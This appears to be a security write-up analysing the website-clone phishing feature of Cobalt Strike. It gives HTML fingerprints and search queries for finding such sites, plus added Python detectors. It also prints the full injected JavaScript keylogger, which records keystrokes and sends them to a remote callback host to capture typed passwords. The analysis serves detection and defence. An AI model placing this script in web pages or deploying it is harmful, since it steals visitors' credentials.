Analysis of cs phishing clone website

enhackapt


Analysis process

cs clone

cs phishing clone website analysis-1.png





Compare the cloned HTML with the original HTML

cs phishing clone website analysis-2.png





Features:


  1. The IFRAME tag is uppercase and has a width and height of 0.
  2. The script tag loads the JS path "/jquery/jquery.min.js".

Ordering features:


  1. When the IFRAME tag and the script tag both appear, they must be in this order: IFRAME tag, script tag, body tag.
  2. When only one of the IFRAME tag and the script tag appears, it must come before the body tag.
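
A checker for the features and ordering rules above, written as an added example (not part of the original post or of any tool it mentions). It assumes the body tag in the rules is the closing `</body>` and also tests for the `<base href=` clause used in the search queries at the end of the post; the function name and the sample pages are constructed.

```python
import re

# Case-sensitive on purpose: the injected tag is uppercase with zero size.
IFRAME_RE = re.compile(
    r'<IFRAME\b(?=[^>]*\bWIDTH="0")(?=[^>]*\bHEIGHT="0")[^>]*>\s*</IFRAME>')
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc="/jquery/jquery\.min\.js"[^>]*>\s*</script>', re.I)
BASE_RE = re.compile(r'<head>\s*<base\s+href=', re.I)
BODY_RE = re.compile(r'</body\s*>', re.I)


def clone_features(html):
    """Report which clone features appear and whether the ordering rule holds."""
    iframe, script = IFRAME_RE.search(html), SCRIPT_RE.search(html)
    body = [m.start() for m in BODY_RE.finditer(html)]
    found = [name for name, m in (("iframe", iframe), ("script", script)) if m]
    if BASE_RE.search(html):
        found.append("base_href")
    # Ordering rule: IFRAME, then script, then body; a lone tag still precedes body.
    pos = [m.start() for m in (iframe, script) if m]
    ordered = bool(pos and body) and pos == sorted(pos) and pos[-1] < body[-1]
    return {"found": found, "ordered": ordered,
            "suspicious": ordered and "base_href" in found}


# Constructed sample pages (not taken from a real site).
CLONE = ('<html><head> <base href="https://login.example.com/"><title>Sign in'
         '</title></head><body><form></form>'
         '<IFRAME SRC="https://files.example.net/a" WIDTH="0" HEIGHT="0"></IFRAME>'
         '<script src="/jquery/jquery.min.js"></script> </body></html>')
LEGIT = ('<html><head><script src="/jquery/jquery.min.js"></script></head>'
         '<body><iframe src="/map" width="600" height="400"></iframe></body></html>')
SWAPPED = CLONE.replace('<script src="/jquery/jquery.min.js"></script> ', '').replace(
    '<IFRAME', '<script src="/jquery/jquery.min.js"></script><IFRAME')

if __name__ == "__main__":
    for name, page in (("clone", CLONE), ("legit", LEGIT), ("swapped", SWAPPED)):
        print(name, clone_features(page))
```

The LEGIT page shows why the script path alone is a weak signal: it satisfies the ordering rule but is only flagged once the other features are present.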

Referenced JS analysis:


```javascript
var cfqPdaQzXzSSf = 0;
window.onload = function loadfqPdaQzXzSSf() { // Page load handler
    lfqPdaQzXzSSf = ",";
    if (window.addEventListener) { // Standard event registration
        document.addEventListener('keypress', pfqPdaQzXzSSf, true); // keypress events are handled by pfqPdaQzXzSSf
        document.addEventListener('keydown', dfqPdaQzXzSSf, true); // keydown events (a key is pressed) are handled by dfqPdaQzXzSSf
    } else if (window.attachEvent) { // attachEvent is for IE versions below 9; everything else supports addEventListener
        document.attachEvent('onkeypress', pfqPdaQzXzSSf);
        document.attachEvent('onkeydown', dfqPdaQzXzSSf);
    } else { // Neither is supported: assign the handler properties directly
        document.onkeypress = pfqPdaQzXzSSf;
        document.onkeydown = dfqPdaQzXzSSf;
    }
}

function pfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which; // Use window.event when it exists, otherwise the event passed to the handler
    kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(16); // Convert the key code to a hexadecimal string
    if (kfqPdaQzXzSSf != "d") { // Skip 0xd (13, Enter), which the keydown handler reports
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function dfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which;
    if (kfqPdaQzXzSSf == 9 || kfqPdaQzXzSSf == 8 || kfqPdaQzXzSSf == 13) { // Tab key, backspace key, enter key
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function fqPdaQzXzSSf(kfqPdaQzXzSSf) {
    lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + ","; // Append the key code to the buffer
    var tfqPdaQzXzSSf = "ZUyQXfawhPbi" + cfqPdaQzXzSSf;
    cfqPdaQzXzSSf++;
    var ffqPdaQzXzSSf;
    if (document.all && (navigator.appVersion.match(/MSIE ([\d.]+)/)[1]) <= 8.0) { // IE version 8.0 or lower
        ffqPdaQzXzSSf = document.createElement(String.fromCharCode(60) + "script name='" + tfqPdaQzXzSSf + "' id='" + tfqPdaQzXzSSf + "'" + String.fromCharCode(62) + String.fromCharCode(60) + "/script" + String.fromCharCode(62));
    } else {
        ffqPdaQzXzSSf = document.createElement("script");
        ffqPdaQzXzSSf.setAttribute("id", tfqPdaQzXzSSf);
        ffqPdaQzXzSSf.setAttribute("name", tfqPdaQzXzSSf);
    }

    var ejDBFWFHhff = '?id=' + window.location.href.split(/\?id=/)[1]; // Carry over the id parameter from the current page URL
    ffqPdaQzXzSSf.setAttribute("src", "http://10.23.66.18:8080/callback " + ejDBFWFHhff + "&data=" + lfqPdaQzXzSSf);
    ffqPdaQzXzSSf.style.visibility = "hidden";
    document.body.appendChild(ffqPdaQzXzSSf); // Appending the script element issues the request that carries the key codes
    if (kfqPdaQzXzSSf == 13 || lfqPdaQzXzSSf.length > 3000) { // On the Enter key, or when the buffer exceeds 3000 characters, reset lfqPdaQzXzSSf
        lfqPdaQzXzSSf = ",";
    }

    setTimeout('document.body.removeChild(document.getElementById("' + tfqPdaQzXzSSf + '"))', 5000); // Delete the created script element after a 5 second delay
}
```


When the page loads, the onload handler registers listeners for keyboard events. When a key event fires, the pfqPdaQzXzSSf and dfqPdaQzXzSSf functions process it and then call the fqPdaQzXzSSf function, which creates a script tag to transmit the key codes to the remote end. The created script tag is deleted after a delay of 5 seconds.


pfqPdaQzXzSSf function:
Converts the key code (the character's ASCII value) to a hexadecimal string and passes it to the fqPdaQzXzSSf function.


dfqPdaQzXzSSf function:
If the tab key, backspace key, or enter key is pressed, calls the fqPdaQzXzSSf function to send the key code.
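
In proxy or web-server logs, the traffic this script generates has a recognisable shape: every key event triggers a request whose data parameter is the previous buffer plus one token. The following added example (not from the original post) flags ids that show this growth; the function names, the min_run threshold, the use of the id value as a session key and the sample URLs are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# data starts with "," and holds comma-terminated tokens: hex strings from the
# keypress handler, plus the raw codes 9, 8 and 13 from the keydown handler.
DATA_RE = re.compile(r'^,(?:[0-9a-f]{1,4},)+$')


def key_buffers(urls):
    """Yield (id, tokens) for request URLs whose query has the logger's shape."""
    for url in urls:
        query = parse_qs(urlsplit(url).query)
        data = query.get("data", [""])[0]
        if "id" in query and DATA_RE.match(data):
            yield query["id"][0], data.strip(",").split(",")


def find_keylog_sessions(urls, min_run=3):
    """Return ids whose buffer grows by exactly one token on consecutive requests."""
    last, runs, hits = {}, {}, set()
    for sid, tokens in key_buffers(urls):
        grew = sid in last and tokens[:-1] == last[sid]
        runs[sid] = runs.get(sid, 1) + 1 if grew else 1
        last[sid] = tokens
        if runs[sid] >= min_run:
            hits.add(sid)
    return sorted(hits)


# Constructed request URLs in log order; host and path are those in the script above.
BASE = "http://10.23.66.18:8080/callback"
SAMPLE_URLS = [
    BASE + "?id=a1&data=,70,",
    BASE + "?id=a1&data=,70,61,",
    "https://shop.example.com/callback?id=77&data=order-confirmed",
    BASE + "?id=a1&data=,70,61,73,",
    BASE + "?id=a1&data=,70,61,73,13,",   # Enter: the script resets its buffer
    BASE + "?id=a1&data=,75,",
    BASE + "?id=zz&data=,41,",
]

if __name__ == "__main__":
    print(find_keylog_sessions(SAMPLE_URLS))
```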


Chrome dynamic debugging

cs phishing clone website analysis-3.png


Keyboard code judgment





cs phishing clone website analysis-4.png


Keyboard code splicing





cs phishing clone website analysis-5.png


The JS creates a script tag that sends the key codes to the remote CS server, and the remote end receives the password

cs phishing clone website analysis-6.png





360 cyberspace mapping feature search:


```
response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"jquery/jquery.min.js\"></script> </body>"

response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"
```



cs phishing clone website analysis-7.png
 